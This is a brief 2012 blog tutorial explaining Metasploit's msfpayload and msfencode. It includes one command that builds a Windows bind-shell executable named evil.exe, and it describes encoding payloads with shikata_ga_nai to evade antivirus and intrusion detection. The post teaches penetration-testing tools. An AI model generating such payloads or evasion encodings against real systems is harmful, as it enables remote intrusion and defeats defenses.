Monday 27 February 2012

MSFpayload and MFSencode

MSFpayload
The msfpayload is a component of Metasploit Framework, thats can use to generate shellcode, executables, and much more for use in exploits outside of the Framework. Shellcode can be generated in many formats including C, Ruby, JavaScript, and even Visual Basic for Applications.

example of the use msfpayload as below :
root@bt:/#msfpayload windows/shell_bind_tcp LPORT=4444 X > /sharefolder/evil.exe

this command is for make payload with type shell bind, this working when target run evil.exe file, attacker can run nc to open connection with the target.

metasploits have many type of payloads.

MSFencode
MSFencode is a component of matasploits framework, MSFencode is use to bypass bad charackter when we generate a payloads, also to bypass antivirus and IDS(intrustion detection system). because when we generate payload using msfpayloads, that result can include bad charackter, and that bad charackter can break your payloads. metasploits have any encoder
as shikata_ga_nai,etc.

for implementation of MSFencode as below :


that is make payload with type shell reverse and generate this payloads using shikata_ga_nai encoder.


No comments:

Post a Comment